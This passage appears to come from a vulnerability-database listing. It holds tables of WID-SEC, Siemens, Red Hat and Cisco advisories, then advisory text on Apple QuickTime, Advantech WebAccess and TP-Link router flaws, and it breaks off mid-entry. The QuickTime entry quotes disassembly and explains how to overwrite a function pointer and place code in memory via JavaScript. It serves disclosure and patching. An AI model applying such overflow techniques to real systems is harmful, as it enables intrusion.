wid-sec-w-2023-0437	GNU Emacs: Mehrere Schwachstellen ermöglichen Codeausführung	2023-02-20T23:00:00.000+00:00	2024-09-19T22:00:00.000+00:00
wid-sec-w-2022-2181	GNU Emacs: Schwachstelle ermöglicht Codeausführung	2022-11-27T23:00:00.000+00:00	2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2184	Wireshark: Mehrere Schwachstellen	2020-12-09T23:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2183	Red Hat Enterprise Linux: Schwachstelle ermöglicht Darstellen falscher Informationen	2024-09-18T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2182	Grafana: Schwachstelle ermöglicht Offenlegung von Informationen	2024-09-18T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2181	Oracle Fusion Middleware: Mehrere Schwachstellen	2020-07-14T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2180	Oracle Fusion Middleware: Mehrere Schwachstellen	2022-04-19T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2178	Drupal: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen	2024-09-18T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2176	xwiki: Mehrere Schwachstellen	2024-09-18T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2051	ClamAV: Mehrere Schwachstellen ermöglichen Denial of Service und Dateimanipulation	2024-09-04T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2035	Red Hat OpenShift: Mehrere Schwachstellen ermöglichen Manipulation von Dateien und Denial of Service	2024-09-03T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-2033	Red Hat Enterprise Linux (CPython): Schwachstelle ermöglicht Manipulation von Dateien	2024-09-02T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1951	expat: Mehrere Schwachstellen ermöglichen Denial of Service	2024-08-29T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1914	Python: Schwachstelle ermöglicht Denial of Service	2024-08-22T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1913	Red Hat OpenShift Container Platform: Mehrere Schwachstellen	2024-08-22T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1828	Intel Prozessor: Mehrere Schwachstellen	2024-08-13T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1783	Mozilla Firefox, Firefox ESR und Thunderbird: Mehrere Schwachstellen	2024-08-06T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1760	ffmpeg: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff	2024-08-05T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1756	Red Hat Enterprise Linux (python-setuptools): Schwachstelle ermöglicht Codeausführung	2024-08-04T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1722	Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff	2024-07-29T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1661	Linux Kernel: Schwachstelle ermöglicht nicht spezifizierten Angriff	2024-07-17T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1646	Linux Kernel: Mehrere Schwachstellen ermöglichen Manipulation von Dateien	2024-07-16T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1625	Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff	2024-07-16T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1562	Red Hat Enterprise Linux: Schwachstelle ermöglicht Offenlegung von Informationen	2024-07-09T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1504	Apache HTTP Server: Mehrere Schwachstellen	2024-07-01T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1474	Red Hat OpenShift Container Platform: Mehrere Schwachstellen	2024-06-27T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1469	OpenSSL: Schwachstelle ermöglicht Denial of Service und Offenlegung von Informationen	2024-06-26T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1418	Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff	2024-06-19T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1322	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe	2024-06-09T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00
wid-sec-w-2024-1287	Golang Go: Mehrere Schwachstellen	2024-06-04T22:00:00.000+00:00	2024-09-18T22:00:00.000+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Publish Date	Update Date
ssa-723487	SSA-723487: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SCALANCE, RUGGEDCOM and Related Products	2024-07-09T00:00:00Z	2024-07-22T00:00:00Z
ssa-071402	SSA-071402: Multiple Vulnerabilities in SICAM Products	2024-07-22T00:00:00Z	2024-07-22T00:00:00Z
ssa-998949	SSA-998949: Hard-coded Default Encryption Key in Mendix Encryption Module V10.0.0 and V10.0.1	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-928781	SSA-928781: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.2 HF1	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-868282	SSA-868282: Multiple Vulnerabilities in SINEMA Remote Connect Client before V3.2 HF1	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-825651	SSA-825651: Deserialization Vulnerability in SIMATIC STEP 7 (TIA Portal) before V18 Update 2	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-824889	SSA-824889: XML File Parsing Vulnerabilities in JT Open and PLM XML SDK	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-780073	SSA-780073: Denial of Service Vulnerability in PROFINET Devices via DCE-RPC Packets	2020-02-11T00:00:00Z	2024-07-09T00:00:00Z
ssa-779936	SSA-779936: Catalog-Profile Deserialization Vulnerability in Siemens Engineering Platforms before V19	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-750274	SSA-750274: Impact of CVE-2024-3400 on RUGGEDCOM APE1808 devices configured with Palo Alto Networks Virtual NGFW	2024-04-19T00:00:00Z	2024-07-09T00:00:00Z
ssa-730482	SSA-730482: Denial of Service Vulnerability in SIMATIC WinCC	2024-04-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-712929	SSA-712929: Denial of Service Vulnerability in OpenSSL (CVE-2022-0778) Affecting Industrial Products	2022-06-14T00:00:00Z	2024-07-09T00:00:00Z
ssa-711309	SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products	2023-09-12T00:00:00Z	2024-07-09T00:00:00Z
ssa-593272	SSA-593272: SegmentSmack in Interniche IP-Stack based Industrial Devices	2020-04-14T00:00:00Z	2024-07-09T00:00:00Z
ssa-484086	SSA-484086: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.1	2022-06-14T00:00:00Z	2024-07-09T00:00:00Z
ssa-473245	SSA-473245: Denial of Service Vulnerability in Profinet Devices	2019-10-08T00:00:00Z	2024-07-09T00:00:00Z
ssa-446448	SSA-446448: Denial of Service Vulnerability in PROFINET Stack Integrated on Interniche Stack	2022-04-12T00:00:00Z	2024-07-09T00:00:00Z
ssa-381581	SSA-381581: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.2 SP1	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-346262	SSA-346262: Denial of Service Vulnerability in SNMP Interface of Industrial Products	2017-11-23T00:00:00Z	2024-07-09T00:00:00Z
ssa-337522	SSA-337522: Multiple Vulnerabilities in TIM 1531 IRC before V2.4.8	2024-06-11T00:00:00Z	2024-07-09T00:00:00Z
ssa-313039	SSA-313039: Deserialization Vulnerability in STEP 7 Safety before V19	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-265688	SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1	2024-04-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-170375	SSA-170375: Multiple Vulnerabilities in RUGGEDCOM ROS before V5.9	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-160243	SSA-160243: Multiple Vulnerabilities in SINEC NMS before V2.0	2023-10-10T00:00:00Z	2024-07-09T00:00:00Z
ssa-064222	SSA-064222: Multiple File Parsing Vulnerabilities in Simcenter Femap before V2406	2024-07-09T00:00:00Z	2024-07-09T00:00:00Z
ssa-900277	SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-879734	SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-871704	SSA-871704: Multiple Vulnerabilities in SICAM Products	2024-05-14T00:00:00Z	2024-06-11T00:00:00Z
ssa-625862	SSA-625862: Multiple Vulnerabilities in Third-Party Components in SIMATIC CP 1542SP-1 and CP 1543SP-1 before V2.3	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-620338	SSA-620338: Buffer Overflow Vulnerability in SICAM AK3 / BC / TM	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Publish Date	Update Date
rhsa-2023_6251	Red Hat Security Advisory: OpenShift Virtualization 4.11.7 Images security and bug fix update	2023-11-01T16:14:42+00:00	2025-03-29T04:25:59+00:00
rhsa-2023_7215	Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.2.12	2023-11-15T00:16:31+00:00	2025-03-29T04:25:57+00:00
rhsa-2023_6298	Red Hat Security Advisory: Release of OpenShift Serverless Client kn 1.30.2 security update	2023-11-03T08:48:21+00:00	2025-03-29T04:25:56+00:00
rhsa-2023_6200	Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.1.9 security updates and bug fixes	2023-10-30T18:15:21+00:00	2025-03-29T04:25:56+00:00
rhsa-2023_6817	Red Hat Security Advisory: OpenShift Virtualization 4.14.0 Images security and bug fix update	2023-11-08T14:03:27+00:00	2025-03-29T04:25:53+00:00
rhsa-2023_6781	Red Hat Security Advisory: openshift-pipelines-client security update	2023-11-08T01:10:46+00:00	2025-03-29T04:25:53+00:00
rhsa-2023_6240	Red Hat Security Advisory: OpenShift Container Platform 4.13 low-latency extras security update	2023-11-01T13:41:55+00:00	2025-03-29T04:25:50+00:00
rhsa-2023_6179	Red Hat Security Advisory: Red Hat Product OCP Tools 4.13 OpenShift Jenkins security update	2023-10-30T13:03:06+00:00	2025-03-29T04:25:47+00:00
rhsa-2023_6828	Red Hat Security Advisory: ACS 4.1 enhancement update	2023-11-08T18:34:59+00:00	2025-03-29T04:25:44+00:00
rhsa-2023_6305	Red Hat Security Advisory: Migration Toolkit for Applications security update	2023-11-06T11:24:51+00:00	2025-03-29T04:25:44+00:00
rhsa-2023_6296	Red Hat Security Advisory: Release of OpenShift Serverless 1.30.2	2023-11-02T19:16:02+00:00	2025-03-29T04:25:44+00:00
rhsa-2023_6243	Red Hat Security Advisory: openshift-gitops-kam security update	2023-11-01T14:08:03+00:00	2025-03-29T04:25:41+00:00
rhsa-2023_6172	Red Hat Security Advisory: Red Hat Product OCP Tools 4.12 Openshift Jenkins security update	2023-10-30T11:24:00+00:00	2025-03-29T04:25:38+00:00
rhsa-2023_6280	Red Hat Security Advisory: Migration Toolkit for Applications security and bug fix update	2023-11-02T10:25:06+00:00	2025-03-29T04:25:35+00:00
rhsa-2023_6235	Red Hat Security Advisory: OpenShift Virtualization 4.13.5 Images security update	2023-11-01T12:04:35+00:00	2025-03-29T04:25:29+00:00
rhsa-2023_6171	Red Hat Security Advisory: Red Hat Product OCP Tools 4.11 Openshift Jenkins security update	2023-10-30T11:10:10+00:00	2025-03-29T04:25:29+00:00
rhsa-2023_6165	Red Hat Security Advisory: skupper-cli and skupper-router security update	2023-10-30T08:22:15+00:00	2025-03-29T04:25:21+00:00
rhsa-2023_6233	Red Hat Security Advisory: Red Hat OpenShift Enterprise security update	2023-11-01T11:34:35+00:00	2025-03-29T04:25:20+00:00
rhsa-2023_6126	Red Hat Security Advisory: OpenShift Container Platform 4.12.41 bug fix and security update	2023-11-01T11:07:20+00:00	2025-03-29T04:25:18+00:00
rhsa-2023_6161	Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.14 security and bug fix update	2023-10-30T02:16:18+00:00	2025-03-29T04:25:11+00:00
rhsa-2023_6115	Red Hat Security Advisory: OpenShift API for Data Protection security update	2023-10-25T14:01:58+00:00	2025-03-29T04:25:11+00:00
rhsa-2023_6220	Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.10.1 security update	2023-10-31T18:22:09+00:00	2025-03-29T04:25:10+00:00
rhsa-2023_6125	Red Hat Security Advisory: OpenShift Container Platform 4.12.41 security and extras update	2023-11-01T10:27:35+00:00	2025-03-29T04:25:09+00:00
rhsa-2023_6217	Red Hat Security Advisory: Red Hat OpenShift Enterprise security update	2023-10-31T14:40:40+00:00	2025-03-29T04:25:02+00:00
rhsa-2023_6156	Red Hat Security Advisory: Red Hat OpenShift support for Windows Containers 8.1.0 security update	2023-10-30T00:25:10+00:00	2025-03-29T04:25:02+00:00
rhsa-2023_6085	Red Hat Security Advisory: Red Hat OpenShift distributed tracing security update	2023-10-24T15:32:35+00:00	2025-03-29T04:25:00+00:00
rhsa-2023_6130	Red Hat Security Advisory: OpenShift Container Platform 4.13.19 bug fix and security update	2023-10-30T13:49:24+00:00	2025-03-29T04:24:59+00:00
rhsa-2023_6031	Red Hat Security Advisory: Cryostat security update	2023-10-23T14:24:36+00:00	2025-03-29T04:24:57+00:00
rhsa-2023_6202	Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.8 security and bug fix updates	2023-10-30T20:13:48+00:00	2025-03-29T04:24:53+00:00
rhsa-2023_6148	Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.7.9 security and bug fix updates	2023-10-26T19:18:44+00:00	2025-03-29T04:24:52+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Publish Date	Update Date
cisco-sa-nso-ordir-mnm8yqzo	Cisco Crosswork Network Services Orchestrator Open Redirect Vulnerability	2024-05-15T16:00:00+00:00	2024-05-15T16:00:00+00:00
cisco-sa-nso-hcc-priv-esc-owbwcs5d	Cisco Crosswork Network Services Orchestrator Privilege Escalation Vulnerability	2024-05-15T16:00:00+00:00	2024-05-15T16:00:00+00:00
cisco-sa-cnfd-rwpesc-zaoufyx8	ConfD CLI Privilege Escalation and Arbitrary File Read and Write Vulnerabilities	2024-05-15T16:00:00+00:00	2024-05-15T16:00:00+00:00
cisco-sa-appd-netvisdos-9znbsjtk	Cisco AppDynamics Network Visibility Service Denial of Service Vulnerability	2024-05-15T16:00:00+00:00	2024-05-15T16:00:00+00:00
cisco-sa-ipphone-multi-vulns-cxahcvs	Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities	2024-05-01T16:00:00+00:00	2024-05-01T16:00:00+00:00
cisco-sa-asaftd-websrvs-dos-x8gnucd2	Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability	2024-04-24T16:00:00+00:00	2024-04-24T16:00:00+00:00
cisco-sa-asaftd-persist-rce-flsnxf4h	Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability	2024-04-24T16:00:00+00:00	2024-04-24T16:00:00+00:00
cisco-sa-asaftd-cmd-inj-zjv8wysm	Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability	2024-04-24T16:00:00+00:00	2024-04-24T16:00:00+00:00
cisco-sa-snmp-uwbxfqww	Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability	2024-04-17T16:00:00+00:00	2024-04-17T16:00:00+00:00
cisco-sa-ios-dos-hq4d3tzg	Cisco IOS Software for Catalyst 6000 Series Switches Denial of Service Vulnerability	2024-03-27T16:00:00+00:00	2024-04-04T15:31:55+00:00
cisco-sa-tms-xss-kgw4dx9y	Cisco TelePresence Management Suite Cross-Site Scripting Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-sbiz-rv-xss-oqertup	Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers Cross-Site Scripting Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-ndru-pesc-kz2pqlzh	Cisco Nexus Dashboard Privilege Escalation Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-ndo-upav-yrqsccsp	Cisco Nexus Dashboard Orchestrator Unauthorized Policy Actions Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-ndidv-lmxdvaf2	Cisco Nexus Dashboard Information Disclosure Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-ndfccsrf-temzefj9	Cisco Nexus Dashboard and Nexus Dashboard Hosted Services Cross-Site Request Forgery Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-ndfc-dir-trav-ssn3aydw	Cisco Nexus Dashboard Fabric Controller Plug and Play Arbitrary File Read Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-ise-ssrf-ftsth5oz	Cisco Identity Services Engine Server-Side Request Forgery Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-ise-csrf-nfakxrp5	Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-ece-xss-csqxgxfm	Cisco Enterprise Chat and Email Cross-Site Scripting Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-cucm-imps-xss-quwkd9yf	Cisco Unified Communications Manager IM & Presence Service Cross-Site Scripting Vulnerability	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-cem-csrf-sucmnjfr	Cisco Emergency Responder Cross-Site Request Forgery and Directory Traversal Vulnerabilities	2024-04-03T16:00:00+00:00	2024-04-03T16:00:00+00:00
cisco-sa-iosxe-utd-cmd-jbl8kvht	Cisco IOS XE Software Unified Threat Defense Command Injection Vulnerability	2024-03-27T16:00:00+00:00	2024-04-02T20:11:04+00:00
cisco-sa-wlc-mdns-dos-4hv6pbgf	Cisco IOS XE Software for Wireless LAN Controllers Multicast DNS Denial of Service Vulnerability	2024-03-27T16:00:00+00:00	2024-03-27T16:00:00+00:00
cisco-sa-lisp-3gyxs3qp	Cisco IOS and IOS XE Software Locator ID Separation Protocol Denial of Service Vulnerability	2024-03-27T16:00:00+00:00	2024-03-27T16:00:00+00:00
cisco-sa-isis-sgjyouhx	Cisco IOS and IOS XE Software Intermediate System-to-Intermediate System Denial of Service Vulnerability	2024-03-27T16:00:00+00:00	2024-03-27T16:00:00+00:00
cisco-sa-iosxe-wlc-privesc-rjsmrmpk	Cisco IOS XE Software for Wireless LAN Controllers Privilege Escalation Vulnerability	2024-03-27T16:00:00+00:00	2024-03-27T16:00:00+00:00
cisco-sa-iosxe-priv-esc-seax6nlx	Cisco IOS XE Software Privilege Escalation Vulnerability	2024-03-27T16:00:00+00:00	2024-03-27T16:00:00+00:00
cisco-sa-iosxe-ospf-dos-dr9sfrxp	Cisco IOS XE Software OSPFv2 Denial of Service Vulnerability	2024-03-27T16:00:00+00:00	2024-03-27T16:00:00+00:00
cisco-sa-ios-xe-sda-edge-dos-qzwuwxwg	Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability	2024-03-27T16:00:00+00:00	2024-03-27T16:00:00+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description
var-200512-0300	Heap-based buffer overflow in Apple Quicktime before 7.0.4 allows remote attackers to execute arbitrary code via a GIF image file with a crafted Netscape Navigator Application Extension Block that modifies the heap in the Picture Modifier block. Apple's QuickTime is a player for files and streaming media in a variety of different formats. A flaw in QuickTime's handling of Targa (TGA) image format files could allow a remote attacker to execute arbitrary code on a vulnerable system. Apple From QuickTime Version that fixes multiple vulnerabilities in 7.0.4 Has been released.Arbitrary code may be executed by a remote third party, DoS You can be attacked. For more information, see the information provided by the vendor. QuickTime is prone to a remote heap-based overflow vulnerability. This issue presents itself when the application processes a specially crafted GIF image file. A successful attack can result in a remote compromise. Versions prior to QuickTime 7.0.4 are vulnerable. This flaw has proven to allow for reliable control of data on the heap chunk and can be exploited via a web site by using ActiveX controls. The heap can be overwritten in the Picture Modifier block. The block size calculate code such as: .text:66A339CC mov ax, [esi+0Ch] .text:66A339D0 xor ecx, ecx .text:66A339D2 mov [esp+34h+var_28], ecx .text:66A339D6 mov [esp+34h+var_24], ecx .text:66A339DA mov [esp+34h+var_20], ecx .text:66A339DE mov [esp+34h+var_1C], ecx .text:66A339E2 mov word ptr [esp+34h+var_10], cx .text:66A339E7 mov [esp+34h+arg_4], eax .text:66A339EB movsx eax, ax .text:66A339EE mov word ptr [esp+34h+var_10+2], cx .text:66A339F3 mov cx, [esi+8] .text:66A339F7 movsx edx, cx .text:66A339FA sub eax, edx .text:66A339FC movsx edx, word ptr [esi+6] .text:66A33A00 add eax, 3Eh .text:66A33A03 push edi .text:66A33A04 movsx edi, word ptr [esi+0Ah] .text:66A33A08 sar eax, 3 .text:66A33A0B lea ebx, [esi+6] .text:66A33A0E and eax, 0FFFFFFFCh .text:66A33A11 sub edi, edx .text:66A33A13 movsx edx, ax .text:66A33A16 mov [esi+4], ax .text:66A33A1A imul edi, edx The allocate code is : .text:66A33A68 push edi .text:66A33A69 call sub_668B5B30 But when it real process data to this memory, it use real decode data to write this memory but didn\xa1\xaft check this heap size. This is segment of the write code function(sub_66AE0A70): .text:66AE0B18 movsx edx, word ptr [edi+12h] ; default .text:66AE0B1C imul edx, [edi+0Ch] .text:66AE0B20 mov ecx, [edi+4] .text:66AE0B23 inc word ptr [edi+16h] .text:66AE0B27 mov eax, [esp+arg_0] .text:66AE0B2B add edx, ecx .text:66AE0B2D mov [eax], edx .text:66AE0B2F mov eax, [ebp+10h] .text:66AE0B32 test eax, eax .text:66AE0B34 jz short loc_66AE0B62 .text:66AE0B36 mov ax, [ebp+1Ch] .text:66AE0B3A mov edx, [ebp+0Ch] .text:66AE0B3D movzx cx, ah .text:66AE0B41 mov ch, al .text:66AE0B43 mov [edx], cx .text:66AE0B46 movsx eax, word ptr [edi+12h] .text:66AE0B4A imul eax, [ebp+14h] .text:66AE0B4E add eax, [ebp+10h] .text:66AE0B51 mov cx, [ebp+18h] .text:66AE0B55 mov [ebp+0Ch], eax .text:66AE0B58 mov [ebp+1Ah], cx .text:66AE0B5C mov word ptr [ebp+1Ch], 0 Vendor Status: Apple has released a patch for this vulnerability. An attacker can create a qtif file and send it to the user via email, web page, or qtif file with activex and can directy overflow a function pointer immediately used so it can bypass any stack overflow protection in systems such as xp sp2 and 2003 sp1. Technical Details: When Quicktime processes the data field of a qtif format file, it will copy it to the stack by a byte to a byte , but there is no proper checking, so it will cause a stack overflow in memory. And in this stack, there is a function pointer which will be used immediately when it pre byte copies, so we can use it to bypass any stack overflow protection, such in xp sp2 and 2003 sp1. The origin function point value is 0x44332211. We only need to overflow it to : 0x08332211, ensuring it didn't cause a crash before the 0x44 has been overflowed to 0x08. When it overflows to 0x08332211, we can execute code to 0x08332211, and can first use javascript to get this memory and set my code in it. call [esp+138h+arg_4] <- call a function point in the stack, but this point can be overflowed References QuickTime: QuickTime File Format http://developer.apple.com/documentation/QuickTime/QTFF/index.html Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Vendor Status: Apple has released a patch for this vulnerability. The patch is available via the Updates section of the affected applications. This vulnerability has been assigned the CVE identifier CVE-2005-2340. Credit: Discovery: Fang Xing Greetings: Thanks to all the guys at eEye, and especially Karl Lynn's help. Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-011A Apple QuickTime Vulnerabilities Original release date: January 11, 2006 Last revised: January 11, 2006 Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows XP * Microsoft Windows 2000 Overview Apple has released QuickTime 7.0.4 to correct multiple vulnerabilities. The impacts of these vulnerabilities include execution of arbitrary code and denial of service. I. Description Apple QuickTime 7.0.4 resolves a number of image and media file handling vulnerabilities. (CAN-2005-3713) II. Impact The impacts of these vulnerabilities vary. For information about specific impacts, please see the Vulnerability Notes. Potential consequences include remote execution of arbitrary code or commands and denial of service. III. Solution Upgrade Upgrade to QuickTime 7.0.4. Appendix A. References * US-CERT Vulnerability Note VU#629845 - <http://www.kb.cert.org/vuls/id/629845> * US-CERT Vulnerability Note VU#921193 - <http://www.kb.cert.org/vuls/id/921193> * US-CERT Vulnerability Note VU#115729 - <http://www.kb.cert.org/vuls/id/115729> * US-CERT Vulnerability Note VU#150753 - <http://www.kb.cert.org/vuls/id/150753> * US-CERT Vulnerability Note VU#913449 - <http://www.kb.cert.org/vuls/id/913449> * CVE-2005-2340 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340> * CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092> * CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707> * CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710> * CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713> * Security Content for QuickTime 7.0.4 - <http://docs.info.apple.com/article.html?artnum=303101> * QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html> * About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ8V8iX0pj593lg50AQJ85wf+OuHVseQVzZ0uI8h8TnmtAJmjzV6tp3Cj 34jwpSLlvo5S8svIHChcX/BYOwKVL/uQZswsjk/mbEu+TrPcVKPd7VPCetxIXVey AdC5hsAH1Wm0MnvY1LgvONo8IQ9RlT6Rj6fY7k7QhPUWsYxj/rDCWDAY9kgsHXc/ HpXWL/Cy5va35z8aYHrLVlxmofKrOWtX0PVa6lSKV8lIsY+TDihA5tYIb5wRDVxL osieJ+MHSXGchXpjX2c0o6Ja6vhJNR61LEwelk9FMLT1JRTkp+wz9/AoVUSyZ/hy 0WBP0M8cwl8koWgijNcLXA18YX8QtDftAVRwpwHKMrbNCYdrWblYVw== =5Kiq -----END PGP SIGNATURE-----
var-201601-0038	Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2790 IOCTL in the DrawSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to BwBuildPath with the Path parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems
var-201801-0394	TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the cmxddns.lua file. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices. These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled). Vulnerability Type: ================ Command Injection (Authenticated) Product: ================ We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306). And the following model should also be affected and the vendor has confirmed: TP-Link ER5110G, TP-Link ER5120G, TP-Link ER5510G, TP-Link ER5520G, TP-Link R4149G, TP-Link R4239G, TP-Link R4299G, TP-Link R473GP-AC, TP-Link R473G, TP-Link R473P-AC, TP-Link R473, TP-Link R478G+, TP-Link R478, TP-Link R478+, TP-Link R483G, TP-Link R483, TP-Link R488, TP-Link WAR1300L, TP-Link 